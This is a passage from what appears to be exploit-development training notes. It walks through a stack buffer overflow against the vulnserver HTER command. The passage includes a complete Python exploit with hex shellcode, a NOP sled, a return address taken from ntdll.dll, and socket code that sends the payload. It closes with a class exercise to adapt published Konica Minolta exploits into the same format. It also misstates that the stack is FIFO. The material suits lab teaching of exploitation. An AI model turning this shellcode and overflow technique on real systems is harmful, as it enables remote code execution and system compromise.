expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(('127.0.0.1', 9999))
expl.recv(100)
expl.send(buffer)
expl.close()

--------------------------------------------------------------


- This will trigger the vulnerability. Our shellcode starts to execute, but later it causes an exception. Why?

- Check the value of EIP and ESP. EIP is the Instruction Pointer. The CPU executes the instruction, which is on this memory address and increments its value, thus moves to the next instruction. ESP is the Stack Pointer. Stack is a FIFO (First In First Out) and when a value is pushed onto the stack, the value of the ESP is decremented. EIP goes from low to high memory, ESP goes from high to low memory (if new values is being pushed onto the stack.)

- If EIP is bigger, than ESP, there is no problem as they are moving away from each other. If EIP is lower than ESP, a problem can raise as they go toward each other and the the program code might change if ESP reaches EIP.

- What is the solution? We have to set the ESP above the EIP. When we jump to the beginning of the shellcode, we can push the value of EAX, then pop this value into ESP. A couple NOP operation might also be necessary

--------------------------Code--------------------------------

#!/usr/bin/python

import socket
import os
import sys


shellcode = (
"bec9d8bc2cd9eed97424f45f2bc9b152"
"83c70431770e03bed65ed9bc0f1c223c"
"d041aad9e141c8aa52729afe5ef9ceea"
"d58fc61d5d2531105e160133dc655693"
"dda5abd21adb4686f397f53677edc5bd"
"cbe34d229b027ff5975c5ff474d5d6ee"
"99d0a1856aae334fa34f9fae0ba2e1f7"
"ac5d9401cfe0afd6ad3e25cc16b49d28"
"a6197bbba4d60fe3a8e9dc98d562e34e"
"5c30c04a04e269cbe045950b4b393340"
"662e4e0bef8363b3ef8bf4c0dd14af4e"
"6edc698991f7ce056cf82e0cabac7e26"
"1acd14b6a318bae60bf37b56eca313bc"
"e39c04bf29b5af3aba7a8746b813da46"
"adbf53a0a72f327b50c91ff7c1168a72"
"c19d39838c553797799602c52ca9b861"
"b2382771bd20f026ea9709a20681a3d0"
"da578b5001a41259c490304910187d3d"
"cc4f2bebaa399d4565957701f0d54757"
"fd333eb74cea07c8617a80b19f1a6f68"
"242a3a300da3e3a10fae131c53d79794"
"2c2c87dd29680f0e40e1fa30f7022f"
)

nops = "90" * 32

# 77DB0BCD from ntdll.dll

buffer = "HTER 0505c" + nops + shellcode + "A" * (2040 - 4 - len(nops) - len(shellcode)) + "CD0BDB77" + "A" * (4106 - 1 - 2040 - 8)

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(('127.0.0.1', 9999))
expl.recv(100)
expl.send(buffer)
expl.close()

--------------------------------------------------------------


You can download the attack scripts from today from here:


Quick challenge:
Your task is to convert the Konica Minolta exploit (https://www.exploit-db.com/exploits/39215/, https://www.exploit-db.com/exploits/38252/, https://www.exploit-db.com/exploits/38254/) to the multiple script format used with vulnserver, SLMail, and Easy File Sharing Web Server 7.2 on your Windows 7 host machine. Email both the scripts and a word document with screenshots detailing how you took the script from exploit-db.com and converted it to the multiple script format on Windows 7. Send both the scripts and the word document to Kofo and Ivana (kofogt@infosecaddicts.com, and ivana@strategicsec.com) in order to receive your CPEs from this class.